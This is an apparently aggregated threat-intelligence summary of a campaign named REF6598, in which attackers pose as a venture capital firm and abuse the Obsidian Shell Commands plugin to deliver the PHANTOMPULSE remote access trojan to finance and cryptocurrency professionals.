Hackers Exploit Obsidian Plugin to Deploy Cross-Platform Malware

Severity: High (Score: 64.5)

Sources: Gbhackers, Cybersecuritynews

Summary

Threat actors are exploiting the Obsidian Shell Commands plugin to deliver malware, specifically targeting professionals in the financial and cryptocurrency sectors. The campaign, identified as REF6598, utilizes social engineering tactics, posing as a venture capital firm to engage victims before transitioning conversations to Telegram. Attackers leverage shared cloud vaults to deploy a malware chain culminating in the PHANTOMPULSE remote access trojan. This method does not exploit any software vulnerabilities, making it particularly insidious. The attack is ongoing, with a focus on individuals rather than organizations, increasing the risk of targeted attacks. Victims are being manipulated through fake partnerships and group chats, complicating detection and response efforts. The full scope of the impact remains unclear, but the targeting of high-value sectors suggests a significant risk. Security professionals are urged to be vigilant and monitor for unusual communications. Key Points: • Hackers exploit Obsidian's Shell Commands plugin to deliver malware without exploiting vulnerabilities. • The campaign targets individuals in the financial and cryptocurrency sectors using social engineering. • Attackers deploy PHANTOMPULSE trojan via shared cloud vaults and Telegram group chats.

Key Entities

• Malware (attack_type)
• Trojan (attack_type)
• Ref6598 (campaign)
• Financial (industry)
• Phantompulse (malware)
• T1059 - Command and Scripting Interpreter (mitre_attack)
• Obsidian (platform)
• Telegram (platform)
• Obsidian Shell Commands Plugin (tool)
• Shell Commands Plugin (tool)